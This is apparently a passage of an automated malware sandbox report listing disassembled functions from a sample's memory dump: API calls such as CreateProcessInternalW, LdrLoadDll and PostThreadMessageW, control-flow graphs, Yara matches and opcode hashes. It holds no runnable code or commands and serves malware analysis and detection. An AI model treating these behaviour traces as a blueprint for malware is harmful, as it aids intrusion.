                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 6af814af644f25fc14816b596a96493da2059180e5279088be310de364e37588
                                                                • Instruction ID: 27e948ba4c3b553fc8cb9ee2978f4e6b61da8d50f99a38ba449d59527a6f87e1
                                                                • Opcode Fuzzy Hash: 6af814af644f25fc14816b596a96493da2059180e5279088be310de364e37588
                                                                • Instruction Fuzzy Hash: 6A90023120550802E100B598541CA46004987E0301F55D011E5024555EC7A689916231
                                                                Function 03932C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 354815b8e08e8cddb7a7fa2198bd4c22e5b0c3c7dbd8f7e9446b2cbaf861b2e7
                                                                • Instruction ID: 98172ed4f2815d0427bf654bb5cfab9b62ea8356319cb310a722b5972f1a69c8
                                                                • Opcode Fuzzy Hash: 354815b8e08e8cddb7a7fa2198bd4c22e5b0c3c7dbd8f7e9446b2cbaf861b2e7
                                                                • Instruction Fuzzy Hash: 0590023120558C02E110B1588418B4A004987D0301F59C411E4424658D87D689917221
                                                                Function 03932C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: e001ed60f218bb91731fe8e3560b831c85ad0b56f0974735bbf18c3d5afc8b45
                                                                • Instruction ID: f6290172e3e94e25e6b5e036ab7bbd1c516736702c71da16ba6ec2b21ab93038
                                                                • Opcode Fuzzy Hash: e001ed60f218bb91731fe8e3560b831c85ad0b56f0974735bbf18c3d5afc8b45
                                                                • Instruction Fuzzy Hash: 8890023120550C42E100B1584418F46004987E0301F55C016E0124654D8756C9517621
                                                                Function 039335C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 1e919ae303389f93ba5ba30e23609fa7407c2bc5b26d66872cace6caab240476
                                                                • Instruction ID: 3963b5324cbc31f56a9c98aaf5695fdabb434fa984d88ada361499a0d93a24e7
                                                                • Opcode Fuzzy Hash: 1e919ae303389f93ba5ba30e23609fa7407c2bc5b26d66872cace6caab240476
                                                                • Instruction Fuzzy Hash: 1690023160960802E100B1584528B06104987D0201F65C411E0424568D87D68A5166A2
                                                                Function 039339B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: ab55054242b4255e283161f0844e9427a2342e3c93150d7cc066d06ea5fb0a88
                                                                • Instruction ID: 589c0370722e23713c11ead713f0e3533cf07478b06ad497c0608540c44abedc
                                                                • Opcode Fuzzy Hash: ab55054242b4255e283161f0844e9427a2342e3c93150d7cc066d06ea5fb0a88
                                                                • Instruction Fuzzy Hash: E590022124955502E150B15C4418A164049A7E0201F55C021E0814594D869689556321
                                                                Function 03210C88 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 420 3210c88-3210ca1 421 3210ca3-3210ca9 420->421 422 3210d0a-3210d22 call 322bec0 420->422 421->422 425 3210c7e-3210c80 421->425 427 3210d28-3210d5a call 3201410 call 3221b60 422->427 428 3210d23 call 3214460 422->428 425->420 433 3210d7a-3210d80 427->433 434 3210d5c-3210d6b PostThreadMessageW 427->434 428->427 434->433 435 3210d6d-3210d77 434->435 435->433
                                                                APIs
                                                                • PostThreadMessageW.USER32(0349A-n,00000111,00000000,00000000), ref: 03210D67
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: 0349A-n$0349A-n
                                                                • API String ID: 1836367815-3456940251
                                                                • Opcode ID: dfa0a338930165ac678ad71770cc00a65904bba8058a009367f9d5d8d809c143
                                                                • Instruction ID: 39d3c97754c9c3373ce256291db59829a210eecc74b311bf519f7ece3c3855e0
                                                                • Opcode Fuzzy Hash: dfa0a338930165ac678ad71770cc00a65904bba8058a009367f9d5d8d809c143
                                                                • Instruction Fuzzy Hash: 0011597691024976DB11DBE18C40DEFBB7CEF91398F08C044F9042B101D6746DD687E1
                                                                Function 03210CF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 436 3210cf0-3210d02 437 3210d0a-3210d22 call 322bec0 436->437 438 3210d05 call 322b4b0 436->438 441 3210d28-3210d5a call 3201410 call 3221b60 437->441 442 3210d23 call 3214460 437->442 438->437 447 3210d7a-3210d80 441->447 448 3210d5c-3210d6b PostThreadMessageW 441->448 442->441 448->447 449 3210d6d-3210d77 448->449 449->447
                                                                APIs
                                                                • PostThreadMessageW.USER32(0349A-n,00000111,00000000,00000000), ref: 03210D67
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: 0349A-n$0349A-n
                                                                • API String ID: 1836367815-3456940251
                                                                • Opcode ID: edc4496dcc0aefe1b98cb30c1f16a78f26252d43de6461ffa0efa680cac9b340
                                                                • Instruction ID: 5cc4dcdcae809c5523975d41e62bb7ee4a6bc3c5a3511a49043addbfeab9153f
                                                                • Opcode Fuzzy Hash: edc4496dcc0aefe1b98cb30c1f16a78f26252d43de6461ffa0efa680cac9b340
                                                                • Instruction Fuzzy Hash: C101D6B5D1021C7AEB10EBE58C81DEF7F7CEF41698F048064FA046B140D6786E4687B1
                                                                Function 03210CAC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 450 3210cac-3210cb8 450->450 451 3210cba-3210cbd 450->451 452 3210d20-3210d5a call 3214460 call 3201410 call 3221b60 451->452 453 3210cbf-3210cc9 451->453 460 3210d7a-3210d80 452->460 461 3210d5c-3210d6b PostThreadMessageW 452->461 453->452 461->460 462 3210d6d-3210d77 461->462 462->460
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0349A-n$0349A-n
                                                                • API String ID: 0-3456940251
                                                                • Opcode ID: cfe7cf1da4da99408f10d77fd98575b04b818501d992f42e07c6c0985285a9b3
                                                                • Instruction ID: afa89c463d6db16603b463bda2395c3870dbf33eded443eea651f0ccbc293721
                                                                • Opcode Fuzzy Hash: cfe7cf1da4da99408f10d77fd98575b04b818501d992f42e07c6c0985285a9b3
                                                                • Instruction Fuzzy Hash: 22017BBA92124DBECB10DBB54C80DAF7BBCDEA2798B08C091F400EB141D5745DD687B6
                                                                Function 03223A10 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Sleep.KERNELBASE(000007D0), ref: 03223AEB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID: net.dll$wininet.dll
                                                                • API String ID: 3472027048-1269752229
                                                                • Opcode ID: c758d46a83ccbc2e001e98f9e51144ab6d2e3ec67bde8de0d24d9f42c8a4a20a
                                                                • Instruction ID: e46c891566d03a4eced0a8ccb18d50cae316773aedd3b07b64c00518a07499c4
                                                                • Opcode Fuzzy Hash: c758d46a83ccbc2e001e98f9e51144ab6d2e3ec67bde8de0d24d9f42c8a4a20a
                                                                • Instruction Fuzzy Hash: 08315CB5610705BBD714DFA4CC80FEBBBB8FB88704F544569E619AB280D7B46680CBA4
                                                                Function 0321F429 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InitializeUninitialize
                                                                • String ID: @J7<
                                                                • API String ID: 3442037557-2016760708
                                                                • Opcode ID: 6ff67cc44ea29b663d8a00fcdba15c28879c7a63330304db09f29e75e2b87ff3
                                                                • Instruction ID: 7d895c4c8989e7064ff730eeb4bb98c084090459a5fa62dc3d67e93d5db50dcb
                                                                • Opcode Fuzzy Hash: 6ff67cc44ea29b663d8a00fcdba15c28879c7a63330304db09f29e75e2b87ff3
                                                                • Instruction Fuzzy Hash: 963161B6A1020AAFCB00DFD8DD809EFB7B9FF88304B148559E515AB204D774EE45CBA0
                                                                Function 0321F430 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InitializeUninitialize
                                                                • String ID: @J7<
                                                                • API String ID: 3442037557-2016760708
                                                                • Opcode ID: f3e160a9f1e899d13c39d3ff7a73cf50051c7985fc115966b4742201c8117501
                                                                • Instruction ID: b3e1f23d32dbabfc39f69919623eb601a9ad2a06580f5331da6db32ff13fd293
                                                                • Opcode Fuzzy Hash: f3e160a9f1e899d13c39d3ff7a73cf50051c7985fc115966b4742201c8117501
                                                                • Instruction Fuzzy Hash: 5E3162B5A1020AAFCB00DFD8DC809EFB7B9BF88304B108559E515EB204D774EE45CBA0
                                                                Function 032182D0 Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 24206bd2e7392756a88006369877d1835f0d3a6cc93c87b0bb5cd3a1ad5d628b
                                                                • Instruction ID: ed34e44c11f71e12e7acea0c94998b41c6c58bf71a89fdc25f71d32d0eb623e3
                                                                • Opcode Fuzzy Hash: 24206bd2e7392756a88006369877d1835f0d3a6cc93c87b0bb5cd3a1ad5d628b
                                                                • Instruction Fuzzy Hash: 1F21007602DAD62BE722CA34CE802E2FFDDDB73210B6C025CD9D657281C752D45B82C1
                                                                Function 03218279 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 032182AC
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: ae725d5d1022276922e887530209a410d5b39521f7ed0366200988ba5edd385e
                                                                • Instruction ID: a743adb6e22090adb894dc2b8616694c0ca5af86d62663b828ff0c8370327932
                                                                • Opcode Fuzzy Hash: ae725d5d1022276922e887530209a410d5b39521f7ed0366200988ba5edd385e
                                                                • Instruction Fuzzy Hash: 8A01CB3A52578426D730E27CDEC5BA5FBD49F21228F0C03E8E9088F2D2E1B4D1A28281
                                                                Function 03214460 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 032144D2
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Load
                                                                • String ID:
                                                                • API String ID: 2234796835-0
                                                                • Opcode ID: 398b2a412e78966941bbc00af36c1ba151ff0cffd571e2978ca56ccaa8df4b4d
                                                                • Instruction ID: ac5c07aa4352a6e604fbfbf1463302aef8cb43ed3e2ccf860f385cbb1b89100e
                                                                • Opcode Fuzzy Hash: 398b2a412e78966941bbc00af36c1ba151ff0cffd571e2978ca56ccaa8df4b4d
                                                                • Instruction Fuzzy Hash: 46011EB9D1020EBBDF10EAE5DD41F9DB7B89B54208F0441A5EA08AB240FA71E7549B91
                                                                Function 032296F0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateProcessInternalW.KERNELBASE(?,?,?,?,0321823E,00000010,?,?,?,00000044,?,00000010,0321823E,?,?,?), ref: 03229753
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateInternalProcess
                                                                • String ID:
                                                                • API String ID: 2186235152-0
                                                                • Opcode ID: 016bd8ce1746197e8720e3a876af95e62b55fcc460ffb57a2bf48c7dd99eb0d8
                                                                • Instruction ID: 051cda1f6d071cf49b930c7ed59a2a305bbfbfbb65400ec179f0acda904c3023
                                                                • Opcode Fuzzy Hash: 016bd8ce1746197e8720e3a876af95e62b55fcc460ffb57a2bf48c7dd99eb0d8
                                                                • Instruction Fuzzy Hash: 3B01CCB6210208BFCB04DE89DC81EEB77ADAF8C714F408208BA09E7240D630F8518BA4
                                                                Function 03209CA0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03209CE5
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateThread
                                                                • String ID:
                                                                • API String ID: 2422867632-0
                                                                • Opcode ID: 81bed8db2255a654e2e4f5805a192615afbdbb60f304de946e01026b61b93252
                                                                • Instruction ID: 178b648155f779cfa317d06134e2b54d8b45fc2ad8051a229141c9368f934df6
                                                                • Opcode Fuzzy Hash: 81bed8db2255a654e2e4f5805a192615afbdbb60f304de946e01026b61b93252
                                                                • Instruction Fuzzy Hash: 92F0653739031436E320B5AA9C12FD7B69CDB84B61F140426FB1CEF2C1D9D1B49142A4
                                                                Function 03209C9A Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03209CE5
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateThread
                                                                • String ID:
                                                                • API String ID: 2422867632-0
                                                                • Opcode ID: 55c12ee0478bd197b30b76699c9a20714714125b54a48bb0ad2dbbf9c5c8d5a6
                                                                • Instruction ID: 93cfc8bce6267aae08d781145535dcaa8a2315be78eb63b279de0f69f2d4756b
                                                                • Opcode Fuzzy Hash: 55c12ee0478bd197b30b76699c9a20714714125b54a48bb0ad2dbbf9c5c8d5a6
                                                                • Instruction Fuzzy Hash: A6F06D7A2D071437E320E695CC52FD7769CDF84B60F140019FB18AF2C1DAE5B49187A4
                                                                Function 03228250 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 03228290
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Path$NameName_
                                                                • String ID:
                                                                • API String ID: 3514427675-0
                                                                • Opcode ID: f3ad759f8a2e3c330957912baa94d0c0ea92c78bac11ffc54db39c128386f781
                                                                • Instruction ID: 5ec5364bad9922a81d57211f6693b132208741a86ae7371472cf8d7e68f29aed
                                                                • Opcode Fuzzy Hash: f3ad759f8a2e3c330957912baa94d0c0ea92c78bac11ffc54db39c128386f781
                                                                • Instruction Fuzzy Hash: 5AF030756002147BD710EE59DC40E9B77ACEFC8760F408008FA08A7241D670B8618BF4
                                                                Function 03229610 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(03211969,?,03225DDF,03211969,032255FF,03225DDF,?,03211969,032255FF,00001000,?,?,00000000), ref: 0322964C
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: 7b7813cea5ecf29619ebb5f332fdfad85baad263fae7f034d9bc4f129238223b
                                                                • Instruction ID: 9ec8e47e19d2b77799b17587bb0b9f9f9656e86fbedc6ca7de8bef3d44e1470f
                                                                • Opcode Fuzzy Hash: 7b7813cea5ecf29619ebb5f332fdfad85baad263fae7f034d9bc4f129238223b
                                                                • Instruction Fuzzy Hash: 70E06DB56003047FD610EE58DC41F9B37ACEF84710F004008F90CAB241D674B8548AB4
                                                                Function 03229660 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,D0A2AFD0,00000007,00000000,00000004,00000000,03213D3E,000000F4), ref: 0322969C
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID:
                                                                • API String ID: 3298025750-0
                                                                • Opcode ID: 2c7d0e8fa14e5537e8920ab20e4117eb7134f7dcb1150b0d78b0cb26355729ad
                                                                • Instruction ID: 3b4fce26948114c184c2cf920acd22df12e0600c18a05f195a35435d7986f273
                                                                • Opcode Fuzzy Hash: 2c7d0e8fa14e5537e8920ab20e4117eb7134f7dcb1150b0d78b0cb26355729ad
                                                                • Instruction Fuzzy Hash: 49E065BA6103047BD610EE59DC44FAB37ACEF88750F004419F909AB282D7B0BD218BB4
                                                                Function 03214453 Relevance: 1.5, APIs: 1, Instructions: 29libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 032144D2
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Load
                                                                • String ID:
                                                                • API String ID: 2234796835-0
                                                                • Opcode ID: 8aef7e6dee978ff0a08f23e338e06f373b0ad360bf5dbdfaa9cc84fad5eece04
                                                                • Instruction ID: f3a7b4b1e8bc39cdabfa2e392d6a9deb2d3921dd30c65f291894787d5d903e5f
                                                                • Opcode Fuzzy Hash: 8aef7e6dee978ff0a08f23e338e06f373b0ad360bf5dbdfaa9cc84fad5eece04
                                                                • Instruction Fuzzy Hash: 05F0A7B9E10109BBCB10DBD0DC41FADB7B49F14204F048185E50C9E280F671E755DB51
                                                                Function 03218280 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 032182AC
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: 5a49965b76113d7eba8950a62bf73d699cb455ede4163327e3b47103c27001a1
                                                                • Instruction ID: 1d0656b354c4bfade72eac3172347d3e7bae3f4f7458a212f87e8b4eb157594d
                                                                • Opcode Fuzzy Hash: 5a49965b76113d7eba8950a62bf73d699cb455ede4163327e3b47103c27001a1
                                                                • Instruction Fuzzy Hash: 68E0263922070827FB30EAB8DD81FA2739C9B48724F0C0660BD2CCB2C1E178F4A14190
                                                                Function 03218069 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetErrorMode.KERNELBASE(00008003,?,?,03211C70,03227F3E,032255FF,03211C36), ref: 032180A3
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorMode
                                                                • String ID:
                                                                • API String ID: 2340568224-0
                                                                • Opcode ID: 41c98a09423e25b3d80bc38189e147eb8eba39a4a8001bd81624460b1773707e
                                                                • Instruction ID: 99330d0bdb2bdaf336364d437e71f316560d9c784bcbc42e3f4dbdcda9cef58e
                                                                • Opcode Fuzzy Hash: 41c98a09423e25b3d80bc38189e147eb8eba39a4a8001bd81624460b1773707e
                                                                • Instruction Fuzzy Hash: 1AE0C2356503087FFB20EBF4EC63FE5325C5B50350F044464B90CEB2C2EAB1B4A18665
                                                                Function 03218070 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetErrorMode.KERNELBASE(00008003,?,?,03211C70,03227F3E,032255FF,03211C36), ref: 032180A3
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorMode
                                                                • String ID:
                                                                • API String ID: 2340568224-0
                                                                • Opcode ID: 1881ecda90284090cb91987cf95af106e8e22d83d3344d8cc80dfc5dee4a4a96
                                                                • Instruction ID: 4974283e376a853145017d7a7b3774eb6950bfef79bba6063432e3d3d277effc
                                                                • Opcode Fuzzy Hash: 1881ecda90284090cb91987cf95af106e8e22d83d3344d8cc80dfc5dee4a4a96
                                                                • Instruction Fuzzy Hash: B5D0A7753603083BF710F6E5DC16F56328C5B10754F044474BA0CFB2C2F9A6F0A041A9
                                                                Function 03932C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 3577bcac1b610f00da618013f3d5f10ad78465acb55b0498b73e8668e526c9bd
                                                                • Instruction ID: 21704dffb9f327f28d602b929168d657cc32960343870785edf606786a471765
                                                                • Opcode Fuzzy Hash: 3577bcac1b610f00da618013f3d5f10ad78465acb55b0498b73e8668e526c9bd
